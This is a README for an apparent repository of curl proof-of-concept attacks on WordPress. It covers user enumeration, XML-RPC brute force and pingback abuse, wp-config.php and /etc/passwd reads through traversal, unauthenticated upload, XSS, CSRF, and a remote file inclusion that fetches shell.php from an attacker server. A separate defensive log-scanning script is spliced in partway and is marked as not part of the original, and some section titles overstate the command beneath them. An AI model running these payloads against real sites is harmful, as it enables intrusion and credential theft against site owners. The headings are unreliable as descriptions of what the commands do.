This repository contains a collection of Proof of Concepts (PoCs) for exploiting common vulnerabilities in WordPress core, plugins, or misconfigurations. The PoCs are designed to be simple and executed via `curl`.

## Requirements

- `curl` installed on your system.
- (Optional) `jq` for parsing JSON responses.
## PoCs

### User Enumeration via REST API

Extracts a list of usernames using the WordPress REST API.

```bash
curl -s "http://[TARGET_DOMAIN]/wp-json/wp/v2/users" | jq
```

**Expected output:** A JSON object containing user IDs and usernames.

### XML-RPC Pingback Abuse

Abuses the XML-RPC `pingback.ping` method to potentially find vulnerable endpoints or for DDoS amplification.

```bash
curl -X POST "http://[TARGET_DOMAIN]/xmlrpc.php" -d '<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://[VICTIM_SITE]</string></value></param>
<param><value><string>http://[TARGET_DOMAIN]</string></value></param>
</params>
</methodCall>'
```

**Expected output:** A response indicating whether the target site is vulnerable to pingback abuse.

### Exposed Sensitive Files

Some plugins/themes expose sensitive files, such as configuration or backup files.

```bash
curl -s "http://[TARGET_DOMAIN]/wp-content/plugins/[PLUGIN_NAME]/debug.log"
```

**Expected output:** Contents of the exposed file (if available).

### Directory Listing

Checks for publicly accessible directories due to server misconfigurations.

```bash
curl -s "http://[TARGET_DOMAIN]/wp-content/uploads/" | grep "<title>"
```

**Expected output:** HTML content indicating a directory listing page.

### XML-RPC Login Brute Force

Attempts to brute force login credentials via the XML-RPC `wp.login` method, which is commonly vulnerable to brute-force attacks.

```bash
curl -X POST "http://[TARGET_DOMAIN]/xmlrpc.php" -d '<?xml version="1.0"?>
<methodCall>
<methodName>wp.login</methodName>
<params>
<param><value><string>[USERNAME]</string></value></param>
<param><value><string>[PASSWORD]</string></value></param>
</params>
</methodCall>'
```

**Expected output:** Response showing either a successful login or a failure message.

### wp-admin Path Check

Brute forces paths to access the wp-admin login page, useful for misconfigurations or hidden paths.

```bash
curl -s -o /dev/null -w "%{http_code}" "http://[TARGET_DOMAIN]/wp-admin/"
```

**Expected output:** A 200 status code if the wp-admin login page exists.

### Unauthenticated File Upload

Some plugins/themes allow unauthenticated file uploads that could lead to Remote Code Execution (RCE) or web shell uploads.

```bash
curl -F "file=@[FILE_PATH]" "http://[TARGET_DOMAIN]/wp-content/plugins/[PLUGIN_NAME]/upload.php"
```

**Expected output:** Confirmation that the file was uploaded, or an error message.

### wp-config.php Exposure

Exploits a misconfiguration to expose the `wp-config.php` file, which contains sensitive database credentials.

```bash
curl -s "http://[TARGET_DOMAIN]/wp-config.php"
```

**Expected output:** Contents of the `wp-config.php` file, revealing database credentials.

### Login Bypass

Bypasses login pages through known misconfigurations or vulnerabilities.

```bash
curl -X POST "http://[TARGET_DOMAIN]/wp-login.php" -d "log=[USERNAME]&pwd=[PASSWORD]&wp-submit=Log+In&redirect_to=http%3A%2F%2F[TARGET_DOMAIN]%2Fwp-admin%2F"
```

**Expected output:** Response showing whether the login was successful.

### Plugin XSS

Exploits XSS vulnerabilities in WordPress plugins by injecting malicious JavaScript into vulnerable plugin fields.

```bash
curl -X POST "http://[TARGET_DOMAIN]/wp-admin/options-general.php?page=[PLUGIN_PAGE]" -d "setting=<script>alert('XSS')</script>"
```

**Expected output:** JavaScript alert showing the XSS payload execution.

### CSRF

Exploits CSRF vulnerabilities by forcing an admin user to perform unintended actions on their WordPress site.

```bash
curl -X POST "http://[TARGET_DOMAIN]/wp-admin/admin-post.php" -d "action=[ACTION_NAME]&[PARAMETERS]"
```

**Expected output:** Admin action is performed without proper authentication.

### Local File Inclusion (LFI)

Exploits LFI vulnerabilities through URL parameters to include sensitive files like `/etc/passwd` or `wp-config.php`.

```bash
curl -s "http://[TARGET_DOMAIN]/wp-content/themes/[THEME_NAME]/[VULNERABLE_FILE].php?page=../../../../../../etc/passwd"
```

**Expected output:** Contents of the sensitive file, like `/etc/passwd`.

### Remote File Inclusion (RFI)

Exploits vulnerable include statements to execute remote files, typically used for web shell uploads or remote code execution.

```bash
curl -s "http://[TARGET_DOMAIN]/wp-content/themes/[THEME_NAME]/[VULNERABLE_FILE].php?file=http://[ATTACKER_SERVER]/shell.php"
```

**Expected output:** The remote shell being executed on the target server.

### Insecure Deserialization

Exploits insecure deserialization vulnerabilities in WordPress plugins or themes that fail to properly validate user inputs.

```bash
curl -X POST "http://[TARGET_DOMAIN]/wp-admin/admin-ajax.php" -d "action=deserialize&data=[MALICIOUS_PAYLOAD]"
```

**Expected output:** Successful deserialization leading to code execution or privilege escalation.
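A defender-side companion to the PoCs above, added here as an example and not part of the original collection: it parses combined-format web server access log lines, flags requests matching the probe patterns these PoCs generate (REST user enumeration, `xmlrpc.php` POSTs, `wp-config.php` and `debug.log` requests, traversal and remote-include parameters), and reports per source IP which probes were answered with a non-error status. The log lines, IP addresses and signature names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Combined log format: ip - - [ts] "METHOD path HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Signature name -> (required method or None, regex applied to the URL-decoded path)
SIGNATURES = [
    ("rest_user_enum",  None,   re.compile(r"/wp-json/wp/v2/users")),
    ("xmlrpc_post",     "POST", re.compile(r"/xmlrpc\.php")),
    ("config_exposure", None,   re.compile(r"/wp-config\.php")),
    ("debug_log",       None,   re.compile(r"/wp-content/plugins/[^/]+/debug\.log")),
    ("path_traversal",  None,   re.compile(r"\.\./")),
    ("remote_include",  None,   re.compile(r"[?&][^=&]+=https?://")),
]

def classify(line):
    """Parse one log line; return (ip, status, [matching signature names]) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, path, status = m.groups()
    decoded = unquote(path)  # so %2e%2e%2f-encoded traversal is still caught
    hits = [name for name, meth, rx in SIGNATURES
            if (meth is None or meth == method) and rx.search(decoded)]
    return ip, int(status), hits

def scan(lines):
    """Aggregate per source IP: probes seen, and probes answered with 2xx/3xx."""
    report = {}
    for line in lines:
        parsed = classify(line)
        if not parsed or not parsed[2]:
            continue
        ip, status, hits = parsed
        entry = report.setdefault(ip, {"probes": Counter(), "succeeded": Counter()})
        for name in hits:
            entry["probes"][name] += 1
            if status < 400:
                entry["succeeded"][name] += 1
    return report

# Constructed sample lines (not from any real server) covering several PoCs above.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2024:10:00:01 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 412 "-" "curl/8.4.0"',
    '203.0.113.5 - - [10/Oct/2024:10:00:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 390 "-" "curl/8.4.0"',
    '203.0.113.5 - - [10/Oct/2024:10:00:03 +0000] "GET /wp-config.php HTTP/1.1" 403 199 "-" "curl/8.4.0"',
    '203.0.113.5 - - [10/Oct/2024:10:00:04 +0000] "GET /wp-content/themes/t/v.php?page=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1042 "-" "curl/8.4.0"',
    '198.51.100.7 - - [10/Oct/2024:10:05:00 +0000] "GET /?p=12 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
]
```

Run `scan(SAMPLE_LOG)` to see that the `succeeded` counter separates a blocked `wp-config.php` request (403) from a traversal attempt that was served with 200, which is the case worth investigating first.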
## Notes

- Replace `[TARGET_DOMAIN]`, `[USERNAME]`, `[PASSWORD]`, `[PLUGIN_NAME]`, `[FILE_PATH]`, etc., with actual values.
- Use these PoCs responsibly and only on systems you are authorized to test.
- For JSON responses, you can omit `| jq` if you don't have the tool installed.
This toolkit is for educational and authorized penetration testing purposes only. Misuse of this information can result in severe legal consequences.
If you find this work helpful, you can support me:
Thanks for your support! ❤️
